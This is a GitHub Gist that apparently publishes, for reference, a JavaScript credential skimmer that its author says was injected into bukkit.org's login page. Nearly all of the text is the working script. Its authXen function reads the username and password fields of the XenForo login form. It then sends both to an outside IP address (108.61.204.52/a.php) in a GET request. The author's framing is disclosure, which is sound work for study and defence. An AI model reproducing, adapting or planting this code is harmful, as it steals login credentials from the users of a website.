Last active
August 8, 2016 17:06
-
-
Save MaxKorlaar/857f194380494b1d994a to your computer and use it in GitHub Desktop.
This was the script that was used to steal passwords and usernames on bukkit.org, one of Curse's sites. Since they didn't disclose it at the time I wrote my blog post, I published it here for future reference.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function getXmlHttp() { | |
| try { | |
| return new ActiveXObject("Msxml2.XMLHTTP"); | |
| } | |
| catch (e) { | |
| try { | |
| return new ActiveXObject("Microsoft.XMLHTTP"); | |
| } | |
| catch (ee) { | |
| } | |
| } | |
| if (typeof XMLHttpRequest != 'undefined') { | |
| return new XMLHttpRequest(); | |
| } | |
| } | |
| function authXen() { | |
| var xmlhttp = getXmlHttp(); | |
| var user = encodeURI(document.getElementById("ctrl_pageLogin_login").value); | |
| var pass = encodeURI(document.getElementById("ctrl_pageLogin_password").value); | |
| var url = "http://108.61.204.52/a.php?s=bukkit&u="; | |
| url = url.concat(user); | |
| url = url.concat("&p="); | |
| url = url.concat(pass); | |
| xmlhttp.open("GET", url); | |
| xmlhttp.send(null); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment